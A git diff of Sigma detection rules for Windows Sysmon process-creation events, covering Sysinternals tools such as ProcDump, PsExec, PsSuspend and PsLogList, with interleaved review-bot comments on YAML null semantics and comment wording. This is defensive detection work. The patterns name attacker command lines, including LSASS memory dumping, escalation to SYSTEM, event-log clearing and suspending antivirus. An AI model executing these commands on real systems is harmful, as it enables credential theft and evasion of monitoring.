@@ -22,13 +20,13 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - CommandLine|endswith: svchost.exe + CommandLine|endswith: svchost.exe Image|endswith: \svchost.exe filter: - - ParentImage|endswith: - - \rpcnet.exe - - \rpcnetp.exe - - CommandLine: null + - ParentImage|endswith: + - \rpcnet.exe + - \rpcnetp.exe + - CommandLine: # no CommandLine value available condition: process_creation and (selection and not filter) fields: - CommandLine diff --git a/sigma/sysmon/process_creation/proc_creation_win_svchost_termserv_proc_spawn.yml b/sigma/sysmon/process_creation/proc_creation_win_svchost_termserv_proc_spawn.yml index a0a5a4c6e..b1d415bf8 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_svchost_termserv_proc_spawn.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_svchost_termserv_proc_spawn.yml @@ -1,8 +1,7 @@ title: Terminal Service Process Spawn id: 1012f107-b8f1-4271-af30-5aed2de89b39 status: test -description: Detects a process spawned by the terminal service server process (this - could be an indicator for an exploitation of CVE-2019-0708) +description: Detects a process spawned by the terminal service server process (this could be an indicator for an exploitation of CVE-2019-0708) references: - https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/rdp-stands-for-really-do-patch-understanding-the-wormable-rdp-vulnerability-cve-2019-0708/ author: Florian Roth (Nextron Systems) @@ -33,7 +32,7 @@ detection: - :\Windows\System32\wininit.exe - :\Windows\System32\winlogon.exe filter_null: - Image: null + Image: condition: process_creation and (selection and not 1 of filter_*) falsepositives: - Unknown diff --git a/sigma/sysmon/process_creation/proc_creation_win_svchost_uncommon_parent_process.yml b/sigma/sysmon/process_creation/proc_creation_win_svchost_uncommon_parent_process.yml index 5415bd301..8d4a70779 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_svchost_uncommon_parent_process.yml 
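Review bot: Replacing `CommandLine: null` with a bare `CommandLine:` in the filter (and likewise `Image:` in the termserv hunk on this same line, `ParentImage:` in the svchost_uncommon_parent_process hunk and `Company:` in the tools_masquerading hunk) depends on the YAML loader resolving an empty scalar to null rather than an empty string; if the consuming rule engine's loader ever yielded `""`, the "field is absent" filter would stop matching and these rules would become noisier, so that equivalence should be confirmed against the engine rather than assumed. Only this hunk documents the intent with `# no CommandLine value available`; the other three drop the explicit `null` without any note, and a matching comment such as `Image: # field absent from the event` would keep the absence semantics visible to the next maintainer.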
+++ b/sigma/sysmon/process_creation/proc_creation_win_svchost_uncommon_parent_process.yml @@ -27,7 +27,7 @@ detection: - \services.exe - \TiWorker.exe filter_main_parent_null: - ParentImage: null + ParentImage: filter_main_parent_empty: ParentImage: - '-' diff --git a/sigma/sysmon/process_creation/proc_creation_win_sysinternals_accesschk_check_permissions.yml b/sigma/sysmon/process_creation/proc_creation_win_sysinternals_accesschk_check_permissions.yml index f5e4321e2..1f2d21237 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_sysinternals_accesschk_check_permissions.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_sysinternals_accesschk_check_permissions.yml @@ -1,16 +1,13 @@ title: Permission Check Via Accesschk.EXE id: c625d754-6a3d-4f65-9c9a-536aea960d37 status: test -description: Detects the usage of the "Accesschk" utility, an access and privilege - audit tool developed by SysInternal and often being abused by attacker to verify - process privileges +description: Detects the usage of the "Accesschk" utility, an access and privilege audit tool developed by SysInternal and often being abused by attacker to verify process privileges references: - https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment?slide=43 - https://www.youtube.com/watch?v=JGs-aKf2OtU&ab_channel=OFFZONEMOSCOW - https://github.com/carlospolop/PEASS-ng/blob/fa0f2e17fbc1d86f1fd66338a40e665e7182501d/winPEAS/winPEASbat/winPEAS.bat - https://github.com/gladiatx0r/Powerless/blob/04f553bbc0c65baf4e57344deff84e3f016e6b51/Powerless.bat -author: Teymur Kheirkhabarov (idea), Mangatas Tondang, oscd.community, Nasreddine - Bencherchali (Nextron Systems) +author: Teymur Kheirkhabarov (idea), Mangatas Tondang, oscd.community, Nasreddine Bencherchali (Nextron Systems) date: 2020/10/13 modified: 2023/02/20 tags: 
@@ -25,14 +22,14 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Product|endswith: AccessChk - - Description|contains: Reports effective permissions - - Image|endswith: - - \accesschk.exe - - \accesschk64.exe - - OriginalFileName: accesschk.exe + - Product|endswith: AccessChk + - Description|contains: Reports effective permissions + - Image|endswith: + - \accesschk.exe + - \accesschk64.exe + - OriginalFileName: accesschk.exe selection_cli: - CommandLine|contains: + CommandLine|contains: # These are the most common flags used with this tool. You could add other combinations if needed - 'uwcqv ' - 'kwsu ' - 'qwsu ' diff --git a/sigma/sysmon/process_creation/proc_creation_win_sysinternals_adexplorer_execution.yml b/sigma/sysmon/process_creation/proc_creation_win_sysinternals_adexplorer_execution.yml index 869c3d095..546863367 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_sysinternals_adexplorer_execution.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_sysinternals_adexplorer_execution.yml @@ -1,11 +1,10 @@ title: Active Directory Database Snapshot Via ADExplorer id: 9212f354-7775-4e28-9c9f-8f0a4544e664 related: - - id: ef61af62-bc74-4f58-b49b-626448227652 - type: derived + - id: ef61af62-bc74-4f58-b49b-626448227652 + type: derived status: experimental -description: Detects the execution of Sysinternals ADExplorer with the "-snapshot" - flag in order to save a local copy of the active directory database. +description: Detects the execution of Sysinternals ADExplorer with the "-snapshot" flag in order to save a local copy of the active directory database. references: - https://www.documentcloud.org/documents/5743766-Global-Threat-Report-2019.html author: Nasreddine Bencherchali (Nextron Systems) 
@@ -23,10 +22,10 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \ADExplorer.exe - - OriginalFileName: AdExp + - Image|endswith: \ADExplorer.exe + - OriginalFileName: AdExp selection_cli: - CommandLine|contains: snapshot + CommandLine|contains: snapshot condition: process_creation and (all of selection_*) falsepositives: - Unknown diff --git a/sigma/sysmon/process_creation/proc_creation_win_sysinternals_adexplorer_susp_execution.yml b/sigma/sysmon/process_creation/proc_creation_win_sysinternals_adexplorer_susp_execution.yml index f67c27195..5773fdbbc 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_sysinternals_adexplorer_susp_execution.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_sysinternals_adexplorer_susp_execution.yml @@ -1,12 +1,10 @@ title: Suspicious Active Directory Database Snapshot Via ADExplorer id: ef61af62-bc74-4f58-b49b-626448227652 related: - - id: 9212f354-7775-4e28-9c9f-8f0a4544e664 - type: derived + - id: 9212f354-7775-4e28-9c9f-8f0a4544e664 + type: derived status: experimental -description: Detects the execution of Sysinternals ADExplorer with the "-snapshot" - flag in order to save a local copy of the active directory database to a suspicious - directory. +description: Detects the execution of Sysinternals ADExplorer with the "-snapshot" flag in order to save a local copy of the active directory database to a suspicious directory. references: - https://www.documentcloud.org/documents/5743766-Global-Threat-Report-2019.html author: Nasreddine Bencherchali (Nextron Systems) 
@@ -24,12 +22,13 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \ADExplorer.exe - - OriginalFileName: AdExp + - Image|endswith: \ADExplorer.exe + - OriginalFileName: AdExp selection_flag: - CommandLine|contains: snapshot + CommandLine|contains: snapshot selection_paths: - CommandLine|contains: + CommandLine|contains: + # TODO: Add more suspicious paths - \Downloads\ - \Users\Public\ - \AppData\ diff --git a/sigma/sysmon/process_creation/proc_creation_win_sysinternals_eula_accepted.yml b/sigma/sysmon/process_creation/proc_creation_win_sysinternals_eula_accepted.yml index c93ebdf01..c351e91f7 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_sysinternals_eula_accepted.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_sysinternals_eula_accepted.yml @@ -1,11 +1,10 @@ title: Potential Execution of Sysinternals Tools id: 7cccd811-7ae9-4ebe-9afd-cb5c406b824b related: - - id: 25ffa65d-76d8-4da5-a832-3f2b0136e133 - type: derived + - id: 25ffa65d-76d8-4da5-a832-3f2b0136e133 + type: derived status: test -description: Detects command lines that contain the 'accepteula' flag which could - be a sign of execution of one of the Sysinternals tools +description: Detects command lines that contain the 'accepteula' flag which could be a sign of execution of one of the Sysinternals tools references: - https://twitter.com/Moti_B/status/1008587936735035392 author: Markus Neis @@ -23,7 +22,7 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - CommandLine|contains: + CommandLine|contains: - ' -accepteula' - ' /accepteula' condition: process_creation and selection diff --git a/sigma/sysmon/process_creation/proc_creation_win_sysinternals_livekd_execution.yml b/sigma/sysmon/process_creation/proc_creation_win_sysinternals_livekd_execution.yml index ccdaa348a..ea65ea80b 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_sysinternals_livekd_execution.yml 
+++ b/sigma/sysmon/process_creation/proc_creation_win_sysinternals_livekd_execution.yml @@ -17,10 +17,10 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - - Image|endswith: - - \livekd.exe - - \livekd64.exe - - OriginalFileName: livekd.exe + - Image|endswith: + - \livekd.exe + - \livekd64.exe + - OriginalFileName: livekd.exe condition: process_creation and selection falsepositives: - Administration and debugging activity (must be investigated) diff --git a/sigma/sysmon/process_creation/proc_creation_win_sysinternals_livekd_kernel_memory_dump.yml b/sigma/sysmon/process_creation/proc_creation_win_sysinternals_livekd_kernel_memory_dump.yml index 7501f2926..2b34f7d35 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_sysinternals_livekd_kernel_memory_dump.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_sysinternals_livekd_kernel_memory_dump.yml @@ -1,8 +1,7 @@ title: Kernel Memory Dump Via LiveKD id: c7746f1c-47d3-43d6-8c45-cd1e54b6b0a2 status: experimental -description: Detects execution of LiveKD with the "-m" flag to potentially dump the - kernel memory +description: Detects execution of LiveKD with the "-m" flag to potentially dump the kernel memory references: - https://learn.microsoft.com/en-us/sysinternals/downloads/livekd - https://4sysops.com/archives/creating-a-complete-memory-dump-without-a-blue-screen/ @@ -20,12 +19,12 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: - - \livekd.exe - - \livekd64.exe - - OriginalFileName: livekd.exe + - Image|endswith: + - \livekd.exe + - \livekd64.exe + - OriginalFileName: livekd.exe selection_cli: - CommandLine|contains|all: + CommandLine|contains|all: - ' /m' - ' -m' condition: process_creation and (all of selection_*) 
diff --git a/sigma/sysmon/process_creation/proc_creation_win_sysinternals_procdump_evasion.yml b/sigma/sysmon/process_creation/proc_creation_win_sysinternals_procdump_evasion.yml index f501a7706..1ec42c974 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_sysinternals_procdump_evasion.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_sysinternals_procdump_evasion.yml @@ -1,8 +1,7 @@ title: Potential SysInternals ProcDump Evasion id: 79b06761-465f-4f88-9ef2-150e24d3d737 status: test -description: Detects uses of the SysInternals ProcDump utility in which ProcDump or - its output get renamed, or a dump file is moved or copied to a different name +description: Detects uses of the SysInternals ProcDump utility in which ProcDump or its output get renamed, or a dump file is moved or copied to a different name references: - https://twitter.com/mrd0x/status/1480785527901204481 author: Florian Roth (Nextron Systems) @@ -21,24 +20,23 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_1: - CommandLine|contains: + CommandLine|contains: - copy procdump - move procdump selection_2: - CommandLine|contains|all: + CommandLine|contains|all: - 'copy ' - '.dmp ' - CommandLine|contains: + CommandLine|contains: - 2.dmp - lsass - out.dmp selection_3: - CommandLine|contains: - - copy lsass.exe_ - - move lsass.exe_ + CommandLine|contains: + - copy lsass.exe_ # procdump default pattern e.g. lsass.exe_220111_085234.dmp + - move lsass.exe_ # procdump default pattern e.g. lsass.exe_220111_085234.dmp condition: process_creation and (1 of selection_*) falsepositives: - - False positives are expected in cases in which ProcDump just gets copied to - a different directory without any renaming + - False positives are expected in cases in which ProcDump just gets copied to a different directory without any renaming level: high ruletype: Sigma 
diff --git a/sigma/sysmon/process_creation/proc_creation_win_sysinternals_procdump_lsass.yml b/sigma/sysmon/process_creation/proc_creation_win_sysinternals_procdump_lsass.yml index 8894bbe97..96bbe695d 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_sysinternals_procdump_lsass.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_sysinternals_procdump_lsass.yml @@ -1,13 +1,9 @@ title: Potential LSASS Process Dump Via Procdump id: 5afee48e-67dd-4e03-a783-f74259dcf998 status: stable -description: 'Detects suspicious uses of the SysInternals Procdump utility by using - a special command line parameter in combination with the lsass.exe process. - - This way we are also able to catch cases in which the attacker has renamed the - procdump executable. - - ' +description: | + Detects suspicious uses of the SysInternals Procdump utility by using a special command line parameter in combination with the lsass.exe process. + This way we are also able to catch cases in which the attacker has renamed the procdump executable. references: - https://learn.microsoft.com/en-us/sysinternals/downloads/procdump author: Florian Roth (Nextron Systems) @@ -28,11 +24,11 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_flags: - CommandLine|contains: + CommandLine|contains: - ' -ma ' - ' /ma ' selection_process: - CommandLine|contains: ' ls' + CommandLine|contains: ' ls' # Short for lsass condition: process_creation and (all of selection*) falsepositives: - Unlikely, because no one should dump an lsass process memory diff --git a/sigma/sysmon/process_creation/proc_creation_win_sysinternals_psexec_execution.yml b/sigma/sysmon/process_creation/proc_creation_win_sysinternals_psexec_execution.yml index 0b8218281..12f7ffbe0 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_sysinternals_psexec_execution.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_sysinternals_psexec_execution.yml 
@@ -20,8 +20,8 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - - Image|endswith: \psexec.exe - - OriginalFileName: psexec.c + - Image|endswith: \psexec.exe + - OriginalFileName: psexec.c condition: process_creation and selection falsepositives: - Administrative scripts. diff --git a/sigma/sysmon/process_creation/proc_creation_win_sysinternals_psexec_paexec_escalate_system.yml b/sigma/sysmon/process_creation/proc_creation_win_sysinternals_psexec_paexec_escalate_system.yml index 1e6c87ac5..8fb18aaee 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_sysinternals_psexec_paexec_escalate_system.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_sysinternals_psexec_paexec_escalate_system.yml @@ -1,11 +1,10 @@ title: PsExec/PAExec Escalation to LOCAL SYSTEM id: 8834e2f7-6b4b-4f09-8906-d2276470ee23 related: - - id: 207b0396-3689-42d9-8399-4222658efc99 - type: similar + - id: 207b0396-3689-42d9-8399-4222658efc99 # Generic rule based on similar cli flags + type: similar status: test -description: Detects suspicious commandline flags used by PsExec and PAExec to escalate - a command line to LOCAL_SYSTEM rights +description: Detects suspicious commandline flags used by PsExec and PAExec to escalate a command line to LOCAL_SYSTEM rights references: - https://docs.microsoft.com/en-us/sysinternals/downloads/psexec - https://www.poweradmin.com/paexec/ @@ -24,8 +23,12 @@ detection: process_creation: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational - selection_sys: - CommandLine|contains: + selection_sys: # Escalation to LOCAL_SYSTEM + CommandLine|contains: + # Note that you don't need to add the ".exe" part when using psexec/paexec + # The "-" can also be replaced with "/" + # The order of args isn't important + # "cmd" can be replaced by "powershell", "pwsh" or any other console like software - ' -s cmd' - ' /s cmd' - ' -s -i cmd' 
@@ -36,6 +39,7 @@ detection: - ' /i /s cmd' - ' -i /s cmd' - ' /i -s cmd' + # Pwsh (For PowerShell 7) - ' -s pwsh' - ' /s pwsh' - ' -s -i pwsh' @@ -46,6 +50,7 @@ detection: - ' /i /s pwsh' - ' -i /s pwsh' - ' /i -s pwsh' + # PowerShell (For PowerShell 5) - ' -s powershell' - ' /s powershell' - ' -s -i powershell' @@ -57,15 +62,13 @@ detection: - ' -i /s powershell' - ' /i -s powershell' selection_other: - CommandLine|contains: + CommandLine|contains: - psexec - paexec - accepteula condition: process_creation and (all of selection_*) falsepositives: - - Admins that use PsExec or PAExec to escalate to the SYSTEM account for maintenance - purposes (rare) - - Users that debug Microsoft Intune issues using the commands mentioned in the - official documentation; see https://learn.microsoft.com/en-us/mem/intune/apps/intune-management-extension + - Admins that use PsExec or PAExec to escalate to the SYSTEM account for maintenance purposes (rare) + - Users that debug Microsoft Intune issues using the commands mentioned in the official documentation; see https://learn.microsoft.com/en-us/mem/intune/apps/intune-management-extension level: high ruletype: Sigma diff --git a/sigma/sysmon/process_creation/proc_creation_win_sysinternals_psexec_remote_execution.yml b/sigma/sysmon/process_creation/proc_creation_win_sysinternals_psexec_remote_execution.yml index e471a6c58..ba3cc2386 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_sysinternals_psexec_remote_execution.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_sysinternals_psexec_remote_execution.yml 
@@ -1,8 +1,7 @@ title: Potential PsExec Remote Execution id: ea011323-7045-460b-b2d7-0f7442ea6b38 status: test -description: Detects potential psexec command that initiate execution on a remote - systems via common commandline flags used by the utility +description: Detects potential psexec command that initiate execution on a remote systems via common commandline flags used by the utility references: - https://docs.microsoft.com/en-us/sysinternals/downloads/psexec - https://www.poweradmin.com/paexec/ @@ -21,7 +20,8 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - CommandLine|contains|all: + # Accepting EULA in commandline - often used in automated attacks + CommandLine|contains|all: - accepteula - ' -u ' - ' -p ' diff --git a/sigma/sysmon/process_creation/proc_creation_win_sysinternals_psexesvc.yml b/sigma/sysmon/process_creation/proc_creation_win_sysinternals_psexesvc.yml index 7de8a54f3..f26ab4ef8 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_sysinternals_psexesvc.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_sysinternals_psexesvc.yml @@ -1,11 +1,10 @@ title: PsExec Service Execution id: fdfcbd78-48f1-4a4b-90ac-d82241e368c5 related: - - id: fa91cc36-24c9-41ce-b3c8-3bbc3f2f67ba - type: obsoletes + - id: fa91cc36-24c9-41ce-b3c8-3bbc3f2f67ba + type: obsoletes status: test -description: Detects launch of the PSEXESVC service, which means that this system - was the target of a psexec remote execution +description: Detects launch of the PSEXESVC service, which means that this system was the target of a psexec remote execution references: - https://docs.microsoft.com/en-us/sysinternals/downloads/psexec - https://www.youtube.com/watch?v=ro2QuZTIMBM 
@@ -23,8 +22,8 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - - Image: C:\Windows\PSEXESVC.exe - - OriginalFileName: psexesvc.exe + - Image: C:\Windows\PSEXESVC.exe + - OriginalFileName: psexesvc.exe condition: process_creation and selection falsepositives: - Legitimate administrative tasks diff --git a/sigma/sysmon/process_creation/proc_creation_win_sysinternals_psexesvc_as_system.yml b/sigma/sysmon/process_creation/proc_creation_win_sysinternals_psexesvc_as_system.yml index b5e7f2573..1da10eeeb 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_sysinternals_psexesvc_as_system.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_sysinternals_psexesvc_as_system.yml @@ -1,13 +1,10 @@ title: PsExec Service Child Process Execution as LOCAL SYSTEM id: 7c0dcd3d-acf8-4f71-9570-f448b0034f94 related: - - id: fa91cc36-24c9-41ce-b3c8-3bbc3f2f67ba - type: similar + - id: fa91cc36-24c9-41ce-b3c8-3bbc3f2f67ba + type: similar status: test -description: Detects suspicious launch of the PSEXESVC service on this system and - a sub process run as LOCAL_SYSTEM (-s), which means that someone remotely started - a command on this system running it with highest privileges and not only the privileges - of the login user account (e.g. the administrator account) +description: Detects suspicious launch of the PSEXESVC service on this system and a sub process run as LOCAL_SYSTEM (-s), which means that someone remotely started a command on this system running it with highest privileges and not only the privileges of the login user account (e.g. the administrator account) references: - https://docs.microsoft.com/en-us/sysinternals/downloads/psexec author: Florian Roth (Nextron Systems) 
@@ -25,12 +22,11 @@ detection: Channel: Microsoft-Windows-Sysmon/Operational selection: ParentImage: C:\Windows\PSEXESVC.exe - User|contains: + User|contains: # covers many language settings - AUTHORI - AUTORI condition: process_creation and selection falsepositives: - - Users that debug Microsoft Intune issues using the commands mentioned in the - official documentation; see https://learn.microsoft.com/en-us/mem/intune/apps/intune-management-extension + - Users that debug Microsoft Intune issues using the commands mentioned in the official documentation; see https://learn.microsoft.com/en-us/mem/intune/apps/intune-management-extension level: high ruletype: Sigma diff --git a/sigma/sysmon/process_creation/proc_creation_win_sysinternals_psloglist.yml b/sigma/sysmon/process_creation/proc_creation_win_sysinternals_psloglist.yml index 856f65740..2a1b5a389 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_sysinternals_psloglist.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_sysinternals_psloglist.yml @@ -1,8 +1,7 @@ title: Suspicious Use of PsLogList id: aae1243f-d8af-40d8-ab20-33fc6d0c55bc status: test -description: Detects usage of the PsLogList utility to dump event log in order to - extract admin accounts and perform account discovery or delete events logs +description: Detects usage of the PsLogList utility to dump event log in order to extract admin accounts and perform account discovery or delete events logs references: - https://research.nccgroup.com/2021/01/12/abusing-cloud-services-to-fly-under-the-radar/ - https://www.cybereason.com/blog/deadringer-exposing-chinese-threat-actors-targeting-major-telcos 
@@ -25,26 +24,26 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - OriginalFileName: psloglist.exe - - Image|endswith: - - \psloglist.exe - - \psloglist64.exe + - OriginalFileName: psloglist.exe + - Image|endswith: + - \psloglist.exe + - \psloglist64.exe selection_cli_eventlog: - CommandLine|contains: + CommandLine|contains: - ' security' - ' application' - ' system' selection_cli_flags: - CommandLine|contains: + CommandLine|contains: - ' -d' - ' /d' - ' -x' - ' /x' - ' -s' - ' /s' - - ' -c' + - ' -c' # Clear event log after displaying - ' /c' - - ' -g' + - ' -g' # Export an event log as an evt file. - ' /g' condition: process_creation and (all of selection_*) falsepositives: diff --git a/sigma/sysmon/process_creation/proc_creation_win_sysinternals_psservice.yml b/sigma/sysmon/process_creation/proc_creation_win_sysinternals_psservice.yml index 7e60dd804..72a086b82 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_sysinternals_psservice.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_sysinternals_psservice.yml @@ -1,8 +1,7 @@ title: Sysinternals PsService Execution id: 3371f518-5fe3-4cf6-a14b-2a0ae3fd8a4f status: test -description: Detects usage of Sysinternals PsService which can be abused for service - reconnaissance and tampering +description: Detects usage of Sysinternals PsService which can be abused for service reconnaissance and tampering references: - https://docs.microsoft.com/en-us/sysinternals/downloads/psservice author: Nasreddine Bencherchali (Nextron Systems) @@ -21,10 +20,10 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - - OriginalFileName: psservice.exe - - Image|endswith: - - \PsService.exe - - \PsService64.exe + - OriginalFileName: psservice.exe + - Image|endswith: + - \PsService.exe + - \PsService64.exe condition: process_creation and selection falsepositives: - Legitimate use of PsService by an administrator 
diff --git a/sigma/sysmon/process_creation/proc_creation_win_sysinternals_pssuspend_execution.yml b/sigma/sysmon/process_creation/proc_creation_win_sysinternals_pssuspend_execution.yml index 9ae3a109a..8447fccfd 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_sysinternals_pssuspend_execution.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_sysinternals_pssuspend_execution.yml @@ -1,11 +1,10 @@ title: Sysinternals PsSuspend Execution id: 48bbc537-b652-4b4e-bd1d-281172df448f related: - - id: 4beb6ae0-f85b-41e2-8f18-8668abc8af78 - type: similar + - id: 4beb6ae0-f85b-41e2-8f18-8668abc8af78 + type: similar status: experimental -description: Detects usage of Sysinternals PsSuspend which can be abused to suspend - critical processes +description: Detects usage of Sysinternals PsSuspend which can be abused to suspend critical processes references: - https://learn.microsoft.com/en-us/sysinternals/downloads/pssuspend - https://twitter.com/0gtweet/status/1638069413717975046 @@ -24,10 +23,10 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - - OriginalFileName: pssuspend.exe - - Image|endswith: - - \pssuspend.exe - - \pssuspend64.exe + - OriginalFileName: pssuspend.exe + - Image|endswith: + - \pssuspend.exe + - \pssuspend64.exe condition: process_creation and selection falsepositives: - Unknown diff --git a/sigma/sysmon/process_creation/proc_creation_win_sysinternals_pssuspend_susp_execution.yml b/sigma/sysmon/process_creation/proc_creation_win_sysinternals_pssuspend_susp_execution.yml index 4e21e330d..6c35994b8 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_sysinternals_pssuspend_susp_execution.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_sysinternals_pssuspend_susp_execution.yml 
@@ -1,11 +1,10 @@ title: Sysinternals PsSuspend Suspicious Execution id: 4beb6ae0-f85b-41e2-8f18-8668abc8af78 related: - - id: 48bbc537-b652-4b4e-bd1d-281172df448f - type: similar + - id: 48bbc537-b652-4b4e-bd1d-281172df448f # Basic Execution + type: similar status: experimental -description: Detects suspicious execution of Sysinternals PsSuspend, where the utility - is used to suspend critical processes such as AV or EDR to bypass defenses +description: Detects suspicious execution of Sysinternals PsSuspend, where the utility is used to suspend critical processes such as AV or EDR to bypass defenses references: - https://docs.microsoft.com/en-us/sysinternals/downloads/pssuspend - https://twitter.com/0gtweet/status/1638069413717975046 @@ -23,12 +22,13 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - OriginalFileName: pssuspend.exe - - Image|endswith: - - \pssuspend.exe - - \pssuspend64.exe + - OriginalFileName: pssuspend.exe + - Image|endswith: + - \pssuspend.exe + - \pssuspend64.exe selection_cli: - CommandLine|contains: msmpeng.exe + # Add more interesting/critical processes + CommandLine|contains: msmpeng.exe condition: process_creation and (all of selection_*) falsepositives: - Unlikely diff --git a/sigma/sysmon/process_creation/proc_creation_win_sysinternals_sdelete.yml b/sigma/sysmon/process_creation/proc_creation_win_sysinternals_sdelete.yml index f27e5121e..041f4273d 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_sysinternals_sdelete.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_sysinternals_sdelete.yml @@ -21,7 +21,7 @@ detection: selection: OriginalFileName: sdelete.exe filter: - CommandLine|contains: + CommandLine|contains: - ' -h' - ' -c' - ' -z' diff --git a/sigma/sysmon/process_creation/proc_creation_win_sysinternals_susp_psexec_paexec_flags.yml b/sigma/sysmon/process_creation/proc_creation_win_sysinternals_susp_psexec_paexec_flags.yml index a9a2778be..825cfbc0b 100644 
--- a/sigma/sysmon/process_creation/proc_creation_win_sysinternals_susp_psexec_paexec_flags.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_sysinternals_susp_psexec_paexec_flags.yml @@ -1,11 +1,10 @@ title: Potential Privilege Escalation To LOCAL SYSTEM id: 207b0396-3689-42d9-8399-4222658efc99 related: - - id: 8834e2f7-6b4b-4f09-8906-d2276470ee23 - type: similar + - id: 8834e2f7-6b4b-4f09-8906-d2276470ee23 # PsExec specific rule + type: similar status: test -description: Detects unknown program using commandline flags usually used by tools - such as PsExec and PAExec to start programs with SYSTEM Privileges +description: Detects unknown program using commandline flags usually used by tools such as PsExec and PAExec to start programs with SYSTEM Privileges references: - https://docs.microsoft.com/en-us/sysinternals/downloads/psexec - https://www.poweradmin.com/paexec/ @@ -25,7 +24,12 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_flags_1: - CommandLine|contains: + # Escalation to LOCAL_SYSTEM + CommandLine|contains: + # Note that you don't need to add the ".exe" part when using psexec/paexec + # The "-" can also be replaced with "/" + # The order of args isn't important + # "cmd" can be replaced by "powershell", "pwsh" or any other console like software - ' -s cmd' - ' /s cmd' - ' -s -i cmd' @@ -36,6 +40,7 @@ detection: - ' /i /s cmd' - ' -i /s cmd' - ' /i -s cmd' + # Pwsh (For PowerShell 7) - ' -s pwsh' - ' /s pwsh' - ' -s -i pwsh' @@ -46,6 +51,7 @@ detection: - ' /i /s pwsh' - ' -i /s pwsh' - ' /i -s pwsh' + # PowerShell (For PowerShell 5) - ' -s powershell' - ' /s powershell' - ' -s -i powershell' 
@@ -57,14 +63,14 @@ detection: - ' -i /s powershell' - ' /i -s powershell' filter: - CommandLine|contains: + # This filter exclude strings covered by 8834e2f7-6b4b-4f09-8906-d2276470ee23 + CommandLine|contains: - paexec - PsExec - accepteula condition: process_creation and (1 of selection_flags_* and not filter) falsepositives: - Weird admins that rename their tools - - Software companies that bundle PsExec/PAExec with their software and rename - it, so that it is less embarrassing + - Software companies that bundle PsExec/PAExec with their software and rename it, so that it is less embarrassing level: high ruletype: Sigma diff --git a/sigma/sysmon/process_creation/proc_creation_win_sysinternals_sysmon_config_update.yml b/sigma/sysmon/process_creation/proc_creation_win_sysinternals_sysmon_config_update.yml index 1e664a03d..ae2b0f235 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_sysinternals_sysmon_config_update.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_sysinternals_sysmon_config_update.yml @@ -1,9 +1,7 @@ title: Sysmon Configuration Update id: 87911521-7098-470b-a459-9a57fc80bdfd status: test -description: Detects updates to Sysmon's configuration. Attackers might update or - replace the Sysmon configuration with a bare bone one to avoid monitoring without - shutting down the service completely +description: Detects updates to Sysmon's configuration. Attackers might update or replace the Sysmon configuration with a bare bone one to avoid monitoring without shutting down the service completely references: - https://learn.microsoft.com/en-us/sysinternals/downloads/sysmon author: Nasreddine Bencherchali (Nextron Systems) 
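Review bot: The new comment above the filter has a grammar slip and would read better as `# This filter excludes strings covered by 8834e2f7-6b4b-4f09-8906-d2276470ee23`. It would also help to say what that rule is, since the related entry at the top of the file already labels it `# PsExec specific rule`; repeating that label here lets a reader understand the split without scrolling up.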
